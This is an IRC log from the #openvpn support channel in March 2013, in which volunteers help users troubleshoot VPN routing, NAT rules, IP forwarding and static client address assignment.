sorry 00:21 < latenite> my wifi is just DEAD slow..I can hardly type here 00:22 <@krzee> Dr_Wendy, you can post them and see if anyone catches it, but i note that there is also #iptables and #debian 00:22 <@krzee> well #iptables is ##netfilter but same thing :D 00:22 < Dr_Wendy> i tried debian once before... it was dead silent in there 00:22 < Dr_Wendy> waited for hours with no help 00:22 < Dr_Wendy> >_> 00:22 < Dr_Wendy> maybe a fluke? 00:23 < latenite> my wifi is just DEAD slow..I can hardly type here 00:23 < pekster> #netfilter, single hash 00:23 <@krzee> heh, yet managed to type that 2x 00:23 < Dr_Wendy> krzee: the really frustrating part is that i have this exact setup working perfectly fine with an OpenVZ based vps 00:23 <@krzee> oh ya? i thought it was unofficial, thats cool! 00:23 < latenite> pekster, so why is there always two IP in ifconfig-push? Like 172.31.111.150 172.31.111.145 00:23 < latenite> ifconfig-push 172.31.111.150 172.31.111.145 00:23 < Dr_Wendy> yet on my dedicated server... it fooked up 00:24 < pekster> latenite: manpage expalins it. It's local vs remote of a PtP peerint 00:24 < pekster> peering* 00:24 < pekster> or local/subnet in tap or subnet topology 00:25 < Dr_Wendy> krzee: for the dedicated server... i don't really have any rules set 00:26 < Dr_Wendy> this is what i did... 00:26 < Dr_Wendy> echo 1 > /proc/sys/net/ipv4/ip_forward 00:26 < Dr_Wendy> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j MASQUERADE 00:26 < Dr_Wendy> iptables-save > /etc/iptables.conf 00:26 < Dr_Wendy> echo '#!/bin/sh' > /etc/network/if-up.d/iptables 00:26 < Dr_Wendy> echo "iptables-restore < /etc/iptables.conf" >> /etc/network/if-up.d/iptables 00:26 < Dr_Wendy> chmod +x /etc/network/if-up.d/iptables 00:26 < Dr_Wendy> echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf 00:27 < Dr_Wendy> but... ive also killed the MASQERADE rule... and replaced it with... 00:27 < Dr_Wendy> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j SNAT --to MY.IP.HERE 00:28 < Dr_Wendy> still no data getting through 00:28 < Dr_Wendy> sorry for the spam >_< 00:28 < latenite> pekster, ok found it. How do I figure out the remote-netmask on the server? 00:29 < pekster> Dr_Wendy: Pinging your VPN peer works now? 00:30 < pekster> latenite: No clue, that depends on your setup. netmask is only used in tun+subnet, or tap modes. You use the IP to peer with in p2p or net30 topologies with tun 00:30 < Dr_Wendy> i can properly connect from home just fine 00:30 < latenite> pekster, that's the server: https://gist.github.com/anonymous/5088437 so would it be: 255.255.255.248 00:30 <@vpnHelper> Title: gist:5088437 (at gist.github.com) 00:30 < pekster> Not what I asked. Can you ping the VPN peer via its VPN IP? 00:31 < pekster> latenite: You can't do what you propose with tun. You can't "magically" assign routed connections to a remote subnet like that 00:31 <@krzee> im watching/loving TPB AFK 00:32 < pekster> I took pride that my copyleft OS accessed, downloaded, and is still seeding that, and it's all 100% legit as it's CC-by-sa 00:33 <@krzee> dude just explained to the judge that the DMCA stuff was spam 00:33 <@krzee> lol 00:33 <@krzee> "spam is email i did not request" 00:35 < Dr_Wendy> pekster: https://pastee.org/tqg3s 00:36 < pekster> Dr_Wendy: That's expected (10.8.0.5 is just a virtual peering IP - you reach your server on .1) pastebin 'iptables-save -c' 00:37 < pekster> And then your server openvpn config --- Log closed Tue Mar 05 00:38:49 2013 --- Log opened Tue Mar 05 00:39:43 2013 00:39 -!- ecrist_ [~ecrist@2607:fc50:1001:5200::2] has joined #openvpn 00:39 -!- Irssi: #openvpn: Total of 175 nicks [8 ops, 0 halfops, 5 voices, 162 normal] 00:40 -!- Irssi: Join to #openvpn was synced in 41 secs 00:40 < Dr_Wendy> https://pastee.org/2497w 00:41 < pekster> And venet0 is your upstream interface? 00:41 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 250 seconds] 00:41 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Ping timeout: 246 seconds] --- Log closed Tue Mar 05 00:47:27 2013 --- Log opened Tue Mar 05 00:53:31 2013 00:53 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 00:53 -!- Irssi: #openvpn: Total of 174 nicks [6 ops, 0 halfops, 4 voices, 164 normal] 00:53 -!- mode/#openvpn [+o ecrist] by ChanServ 00:53 < Dr_Wendy> Password is Hello 00:54 -!- Irssi: Join to #openvpn was synced in 40 secs 00:54 < pekster> s/H/h/ 00:54 < Dr_Wendy> ? 00:55 < pekster> You need to add the 'route-gateway 10.8.0.1' directive to the client, or push it from the server 00:55 < pekster> that's not included by default in net30 topology, and you cannot use redirect-gateway without that value IIRC. Client logs probably have an error to this effect 00:56 < Dr_Wendy> no errors in the client logs 00:56 < Dr_Wendy> what i don't understand is that i am not doing anything different from my normal setup 00:57 < Dr_Wendy> however 00:57 < Dr_Wendy> there is one thing that i have neglected to mention... but i don't think it should effect my problem 00:58 < Dr_Wendy> I switched to wheezy and i was using squeeze.... but i used the ovpn squeeze repo to instal ovpn 00:58 < pekster> What's the routing table on the client look like after connection? 00:58 < pekster> !interface 00:58 < pekster> Ugh, bot is missing 00:59 < pekster> simply, 'route print -4' when the VPN is up 00:59 -!- Webhostbudd_ [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has joined #openvpn 00:59 < Dr_Wendy> i would have compiled 2.3.0 from source... but last time i did that... everything installed to non standard directories 01:00 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 255 seconds] 01:00 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 01:00 < Dr_Wendy> route print -4 server side? 01:00 < pekster> /usr/local is quite standard when building from source; touching /usr on a modern Linux distro is going to cause you headache, so don't do it 01:00 < pekster> client side 01:00 < Dr_Wendy> client side will be windows for now 01:01 < pekster> Right, this is why the route command is windows syntax 01:02 < Dr_Wendy> give me a moment to paste this 01:03 -!- Webhostbudd [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has quit [Ping timeout: 255 seconds] 01:09 < Dr_Wendy> any insight pekster? 01:11 < pekster> How far does a traceroute to 4.2.2.1 get? 01:11 < pekster> Or, since this is windows, ' 01:11 < pekster> 'tracert 4.2.2.1' 01:12 < Dr_Wendy> i know how to traceroute in windows lol 01:12 < Dr_Wendy> but yeah, i can connect and try again... but i am certain it just times out 01:12 < Dr_Wendy> everything times out 01:13 < Dr_Wendy> this is what i get when i try to connect to anything after i connect to the server through ovpn 01:14 < pekster> A traceroute should not time out with that setup; you should at the very least get to your server 01:14 < pekster> If you do not, you have much more serious issues 01:14 < pekster> And no, "everything" doesn't time out as you can ping the server itself 01:15 < Dr_Wendy> https://pastee.org/79cyr 01:16 < Dr_Wendy> anything other than the server is unreachable 01:19 < Dr_Wendy> Pinging 8.8.8.8 with 32 bytes of data: 01:19 < Dr_Wendy> Request timed out. 01:19 < Dr_Wendy> Request timed out. 01:19 < Dr_Wendy> Request timed out. 01:19 < Dr_Wendy> Request timed out. 01:19 < Dr_Wendy> Ping statistics for 8.8.8.8: 01:19 < Dr_Wendy> Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), 01:20 < pekster> Right, so, a trace... 01:20 < Dr_Wendy> is taking a long time 01:20 < Dr_Wendy> lol 01:21 < pekster> After maybe 6 hops it won't matter anyway. If you don't get to the server as your next-hop, there's a problem 01:21 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 01:22 < Dr_Wendy> Tracing route to 8.8.8.8 over a maximum of 30 hops 01:22 < Dr_Wendy> 1 111 ms 111 ms 112 ms 10.8.0.1 01:22 < Dr_Wendy> 2 * * * Request timed out. 01:22 < Dr_Wendy> 3 * * * Request timed out. 01:22 < Dr_Wendy> 4 * * * Request timed out. 01:22 < Dr_Wendy> 5 * * * Request timed out. 01:22 < Dr_Wendy> 6 * * * Request timed out. 01:22 < Dr_Wendy> 7 ^C 01:22 < pekster> Check your iptables-save -c output on the server again: is the MASQUERADE rule being hit? 01:23 < pekster> it should have a hitcount with values higher than [0:0] 01:23 < pekster> Next up would be to check 'sysctl net.ipv4.ip_forward' 01:23 < Dr_Wendy> [0:0] -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j MASQUERADE 01:23 < Dr_Wendy> [0:0] -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j SNAT --to-source SERVER.IP.HERE 01:24 < pekster> Should be '1' for forwarding to be enable 01:24 < pekster> +d 01:24 < Dr_Wendy> it is 01:24 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 01:24 -!- mode/#openvpn [+o vpnHelper] by ChanServ 01:24 < pekster> 'ip -r' on the server show the default route out via venet0 (spelling/case counts here) 01:26 < Dr_Wendy> that command does not work 01:26 < Dr_Wendy> could you be more specific? 01:26 < Dr_Wendy> sorry for any trouble 01:26 < rob0> "ip r" 01:26 < pekster> The default route needs to be out via venet0 for the NAT rule to work 01:26 < rob0> no - 01:27 < pekster> rob0: Good catch; I'm up later than I should be. I *think* I put that right in the bot (but best check that too...) 01:27 < pekster> !interface 01:27 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux: 01:27 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes) 01:28 < Dr_Wendy> would you like me to paste my /etc/network/interfaces file? 01:28 < pekster> Just look at 'ip r' for the default route and verify it's venet0 01:28 < pekster> Either it's the wrong interface, or the packets aren't getting routed where you think they are 01:29 < Dr_Wendy> there is 0 mention of venet0 in my interfaces file 01:29 < Dr_Wendy> but that has never been an issue before 01:29 < pekster> You're performing NAT based on that as an output interface... 01:29 < Dr_Wendy> forgive my ignorance... but you lost me there 01:29 < rob0> the SNAT rule would never be hit anyway, since the same matching criteria are used on the previous rule 01:29 < pekster> If you don't actually have that interface, you're not NATing the packets (which is why your hitcounts on the rules have matched 0 packets) and they are thus unroutable as you send them upstream 01:30 < pekster> Dr_Wendy: Your netfilter setup, line 14 here: https://pastee.org/ytd5b 01:30 < pekster> If you do not have a "venet0" interface, then you apparently blindly coppied some example rule from somewhere without understanding that it must match your interface, not the blog you pulled it from 01:30 < pekster> -o is "output interface" as described in iptables(8) 01:31 < Dr_Wendy> only interface i have in use is eth0 01:31 < pekster> Then fix your NAT rule 01:31 < pekster> That's why this doesn't work 01:31 < Dr_Wendy> .__. 01:32 < Dr_Wendy> i wonder if this is an issue with ovh's images 01:32 < Dr_Wendy> when i was using squeeze... that exact rule was fine 01:32 < Dr_Wendy> i'll admit to being a novice with iptables, among other things... but it was working before 01:33 < pekster> Then it would stand to reason either your interface name or netfilter rules changed 01:33 < rob0> You can't use random interface names. Use real names. 01:34 < pekster> Well, you can use a random name if it matches a real one :P. ip link set dev eth0 rob0570463 ;) 01:34 < pekster> s/eth0/name/ 01:34 < pekster> Ugh 01:34 < pekster> Nevermind, I'm going to bed instead. You know what I meant :P 01:35 < Dr_Wendy> so i should change the rule to iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE and it should work? 01:35 < Dr_Wendy> also... do you guys prefer MASQUERADE? 01:36 < Dr_Wendy> or do you use rules more like my other rule 01:36 < pekster> MASQUERADE is fine. Technically it incurs a slight performance hit, but not that's going to impact your usage 01:36 < Dr_Wendy> btw... the reason i usually stick with venet0 is because most of my boxes are vps 01:36 < pekster> You can't "stick with" an interface that doesn't exist 01:37 < Dr_Wendy> lesson learned 01:37 < rob0> Nevertheless, you must use real interface names. 01:37 < Dr_Wendy> you have my sincere thanks 01:37 < Dr_Wendy> all of you 01:40 < Dr_Wendy> so iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j SNAT --to IP.HERE will not incur the same performance hit that MASQUERADE does? 01:40 < Dr_Wendy> just want to be sure before i commit 01:40 < Dr_Wendy> i'd like things to be as efficient as possible 01:41 < pekster> They do the same thing, with the exception that SNAT needs to be updated when your IP changes, while MASQUERADE queries the IP on the interface for every packet. This is a fast query, but it happens for every packet 01:41 < Dr_Wendy> i see 01:42 < Dr_Wendy> thank you pekster 01:43 < Dr_Wendy> working perfectly 01:43 < Dr_Wendy> lesson learned 01:44 < Dr_Wendy> now let's see if i can fix my xen box 01:44 < Dr_Wendy> haha 01:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 01:55 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 01:59 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 252 seconds] 02:10 -!- genghi [~Adium@2.171.156.135] has joined #openvpn 02:12 < genghi> hi all… openvpn is resetting my ipp.txt to zero length after I manually add reservations. What should I do to prevent that? 02:12 < genghi> I am not using duplcate-cn, fwiw 02:18 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 02:19 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 02:19 -!- aaaar0n is now known as ar0nic 02:22 <@krzee> !ipp 02:22 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static 02:22 <@krzee> genghi, ^ =] 02:23 < genghi> thanks 02:23 < genghi> !static 02:23 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 02:24 <@krzee> np 02:24 < genghi> in this case, I have a few addresses that should never be used, if I create a "dummy" ccd with those addresses, will that ensure the reservered addresses will not be allocated? 02:25 < genghi> !iporder 02:25 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 02:27 <@krzee> or you could use addresses outside the pool 02:27 <@krzee> like in the howto here: 02:27 <@krzee> !policy 02:27 <@vpnHelper> "policy" is (#1) http://openvpn.net/howto.html#policy for Configuring client-specific rules and access policies or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules for a lil writeup by mario 02:28 -!- Dr_Wendy [~FuckOff@208.102.159.64] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 02:29 <@krzee> let the pool be for normal users 02:29 <@krzee> ones that need static, give them a different subnet 02:30 <@krzee> then you wont have to worry about it giving out your static ips 02:36 < genghi> it's not a question of handing out dup IPs, there is one address reserved for routing issues that I just don't want allocated even though it is in the beginning of the network range for openvpn clients 02:45 <+EugeneKay> krzee, are you about 02:45 <@krzee> about to smoke one? yep! 02:45 <+EugeneKay> Hehe 02:45 <@krzee> genghi, huh? 02:45 <+EugeneKay> I'm trying to solve a problem with a HA network, maybe you can be of some help 02:46 <+EugeneKay> I have a pair of servers, call them A and B. Both run openvpn, and keepalived. 02:46 <+EugeneKay> Behind them is a coupla LANs, which openvpn clients need to access 02:48 <+EugeneKay> The issue is that if clients are connected to one box, and that box is not the keepalived master, they won't be able to reach any of the server LANs 02:48 <+EugeneKay> What I'm doing as a workaround is nathack 02:49 <+EugeneKay> Thoughts? 02:50 < genghi> given this server config: 10.1.1.128 255.255.255.128 openvpn is handing out 10.1.1.130 as an IP to the first client, though that is the p-t-p addr on the server 02:50 <+EugeneKay> genghi - just use --topology subnet. Really. 02:50 < genghi> so the first client that connects gets an unusable address 02:50 <+EugeneKay> It'll make your life a lot simpler 02:50 < genghi> I am using that 02:50 < genghi> topology subnet 02:51 <+EugeneKay> krzee - oh nevermind.... apparently keepalived has a way to run scripts on takeover/giveback. I'll just abuse that. 02:53 <@krzee> A and B are on the same lans? 02:53 <+EugeneKay> Yeah 02:53 <+EugeneKay> They're redundant routers 02:54 <@krzee> ahh nice 02:54 <@krzee> so linux's carp 02:55 <+EugeneKay> I'll just have the up/down script add/remove a SNAT rule 02:55 <+EugeneKay> I /could/ have it route the traffic to the other node, but that's more failure-prone IMO 02:56 <@krzee> genghi, why split a 1918 block for openvpn? just give it a whole /24 lol 02:56 <+EugeneKay> And at that point I might as well run a full routing daemon, which I'm trying not to do 03:09 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:21 -!- zz_AsadH is now known as AsadH 03:44 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 03:48 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:59 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 252 seconds] 03:59 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:59 < Wulf> Hi 03:59 < Wulf> I need to execute a command as root when a client connects. How can I do that? 04:00 <@krzee> !script 04:00 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 04:00 <@krzee> you'll want client-connect 04:00 <@krzee> and no dropping permissions with --user / --group 04:01 < Wulf> oh, thanks. I was looking at "client-config-dir" 04:02 <@krzee> np 04:10 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] --- Log closed Tue Mar 05 04:21:28 2013 --- Log opened Tue Mar 05 04:33:14 2013 04:33 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 04:33 -!- Irssi: #openvpn: Total of 177 nicks [7 ops, 0 halfops, 4 voices, 166 normal] 04:33 -!- mode/#openvpn [+o ecrist] by ChanServ 04:33 -!- Irssi: Join to #openvpn was synced in 42 secs 04:35 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-kigwgkzeuuhujksq] has quit [Ping timeout: 255 seconds] 04:36 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-obkuahzvfsrfbrdf] has joined #openvpn --- Log closed Tue Mar 05 04:38:23 2013 --- Log opened Tue Mar 05 04:55:56 2013 04:55 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 04:55 -!- Irssi: #openvpn: Total of 175 nicks [6 ops, 0 halfops, 4 voices, 165 normal] 04:55 -!- mode/#openvpn [+o ecrist] by ChanServ 04:56 -!- Irssi: Join to #openvpn was synced in 40 secs 04:56 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 05:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 05:28 -!- mode/#openvpn [+o vpnHelper] by ChanServ 05:33 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 276 seconds] 05:41 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 05:45 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 05:45 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:45 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:06 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 06:07 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 276 seconds] 06:13 -!- sw0rdfish- [~bingo@156.52.198.220] has joined #openvpn 06:13 -!- sw0rdfish- [~bingo@156.52.198.220] has quit [Remote host closed the connection] 06:17 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 06:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:39 < vaillor> which one between privatetunnel.msi and openvpn-install-2.3.0-I004-i686.exe is better? 06:39 -!- micw [~micw@178-24-236-6-dynip.superkabel.de] has joined #openvpn 06:39 < micw> hi 06:40 < micw> i have 2 servers, both with multiple external ips. now I'd like to make one of the ips appear to be on the other server. is this possible with openvpn? 06:40 < micw> I'll explain a bit more: 06:41 < micw> i have ServerA with IP A1 and IP A2 and ServerB with IP B1. 06:41 < micw> now i want to move applications running on IP A2 to ServerB. But the IP is bound to the location of ServerA 06:42 < micw> I'd setup an openvpn connection between both, using a private subnet for the vpn 06:43 < micw> on ServerA i set a route to IP A2 over the vpn 06:43 < micw> on ServerB i simply set up the IP A1. now traffic to IP A2 would go through ServerA to ServerB. But what happens with all answer traffic? 06:45 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 06:45 < micw> or should i use bridging here? 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 06:46 < genghi> do you want the IP live in two locations at once? Or move it over when needed? 06:46 < micw> i want to move it over 06:46 < micw> on ServerA runs a virtual machine (i call it A2) which owns IP A2 06:46 < genghi> sounds to me more like you want heartbeat 06:47 < micw> i want to move it to ServerB and assign there 2 IPs to it (A2 and B2) 06:47 < micw> after this, i migrate all services to IP B2 06:47 < micw> it's just a temporary solution 06:48 < micw> since this are virtual machines (and their virtual network card is part of a bridge) bridging might be a better solution here 06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:49 < micw> can i setup ip-less bridging with openvpn? i.e. simply having the tun/tap devices there which behaves like one local bridge? 06:55 -!- latenite [~latenite@138.77.122.195] has joined #openvpn 06:59 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 07:02 < micw> hey cool. simple routing with minimal openvpn config (static key, 2 fixed peer-to-peer ips) works 07:03 < micw> on ServerA i set a route for IP A2 to the vpn device 07:03 < micw> on ServerB i set the route for IP A2 to the local bridge 07:03 < micw> no idea how the traffic goes way back 07:09 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 07:13 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 07:17 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 245 seconds] 07:23 < vaillor> i connected client-server but they don't ping 07:23 < vaillor> Tue Mar 5 10:32:22 2013 Peer Connection Initiated with [AF_INET]192.168.1.128:1194 07:23 < vaillor> Tue Mar 5 10:32:22 2013 Initialization Sequence Completed 07:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:38 -!- latenite [~latenite@138.77.122.195] has joined #openvpn 07:40 <+EugeneKay> !firewall 07:40 <@vpnHelper> "firewall" is (#1) please see http://openvpn.net/man#lbBD for more info or (#2) see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for brief notes on disabling firewall rulesets. 07:40 < vaillor> no 07:40 < vaillor> i don t have iptables 07:42 <+EugeneKay> 99.99% of the time that's the reason 07:43 < vaillor> i have another interfaces 07:43 < vaillor> and ping them 07:43 <+EugeneKay> You're trying to ping across interfaces? 07:43 < vaillor> yes 07:44 <+EugeneKay> You need to enable net.conf.ipv4.all.forwarding in sysctl 07:44 <+EugeneKay> !redirect 07:44 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 07:44 <@vpnHelper> http://ircpimps.org/redirect.png 07:44 <+EugeneKay> !ipforward 07:44 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 07:44 <+EugeneKay> !linipforward 07:44 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 07:44 <+EugeneKay> That one ^ 07:45 <+EugeneKay> (actually, net.conf.ipv6.... but that's v6) 07:45 < vaillor> i tried echo 1 > /proc/sys/net/ipv4/ip_forward 07:45 < vaillor> but it don't work the same 07:45 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 07:45 <+EugeneKay> Try the redirect flowchart 07:46 < vaillor> i have a ssh daemon on the client 07:46 < vaillor> but it doesn't work with vpn if 07:47 < vaillor> i get a "connection timed out" 07:47 <+EugeneKay> You're skipping around here 07:47 <+EugeneKay> Ping != ssh 07:47 <+EugeneKay> First get ping working(routing and firewalls). Then worry about services 07:48 < vaillor> ok, what i need to do to get ping working? 07:48 <+EugeneKay> I just told you 07:48 < vaillor> !linipforward 07:48 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 07:49 < vaillor> i do not use iptables 07:49 < vaillor> echo 1 > /proc/sys/net/ipv4/ip_forward after this, i don't get any changes 07:51 <+EugeneKay> First get ping working(routing and firewalls). 07:53 < vaillor> EugeneKay, i do not use firewall 07:53 <+EugeneKay> Just because you don't have any rules doesn't mean that it isn't doing anything. 07:56 <+EugeneKay> LOOK at your iptables-save output 07:56 <+EugeneKay> Look at whether you can ping the VPN IP both ways 07:56 <+EugeneKay> Then try pinging your way outwards, making sure you have proper routing set up 07:58 < vaillor> EugeneKay, i already told you that other interfaces works well 07:58 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 276 seconds] 07:58 <+EugeneKay> No, you told me that you couldn't ping them. 08:04 < vaillor> i can't ping only vpn IF 08:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:11 -!- dazo_afk is now known as dazo 08:23 < vaillor> EugeneKay, what can I do to solve the problem? 08:29 < vaillor> 14:40:10 2013 read UDPv4: Connection reset by peer (WSAECONNRESET) (code=10054) 08:29 < vaillor> this is what i get 08:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 08:48 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has joined #openvpn 08:57 < vaillor> icon's screen are "yellow" what does it means? 09:16 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has quit [Read error: Operation timed out] 09:28 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] 09:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:34 -!- micw [~micw@178-24-236-6-dynip.superkabel.de] has quit [Read error: Connection reset by peer] 09:34 -!- vpopov [~happylife@dyn-60-219.fttbee.kis.ru] has joined #openvpn 09:46 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 10:12 -!- vpopov [~happylife@dyn-60-219.fttbee.kis.ru] has quit [Ping timeout: 255 seconds] 10:13 -!- raidz_away is now known as raidz 10:16 < vaillor> anybody online? 10:16 < dropje> !ask 10:16 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 10:20 < vaillor> i connected served and client 10:20 < vaillor> but is there a problem 10:20 < vaillor> i can't ping 10:21 < vaillor> root@debian-VM:~# ping 10.3.0.1 10:21 < vaillor> PING 10.3.0.1 (10.3.0.1) 56(84) bytes of data. 10:21 < vaillor> From 10.3.0.2 icmp_seq=1 Destination Host Unreachable 10:23 < dropje> vaillor: read the link posted by the bot: http://workaround.org/getting-help-on-irc you can't expect any help posting just this 10:25 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 248 seconds] 10:26 -!- vpopov [~happylife@46.251.87.237] has joined #openvpn 10:29 < vaillor> i told the problem 10:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:35 < dropje> vaillor: i have a problem.. i google and it doesnt work. whats wrong? 10:35 < vaillor> [17:20:11] i connected served and client 10:35 < vaillor> [17:20:16] but is there a problem 10:35 < vaillor> [17:20:26] i can't ping 10:36 < dropje> vaillor: i can read.. so what are people in this channel supposed to make of that? well, you have a problem? whats wrong? i haven't got a clue 10:36 < dropje> as you didn't supply any information 10:37 < dropje> !welcome 10:37 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 10:37 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:46 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 10:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined 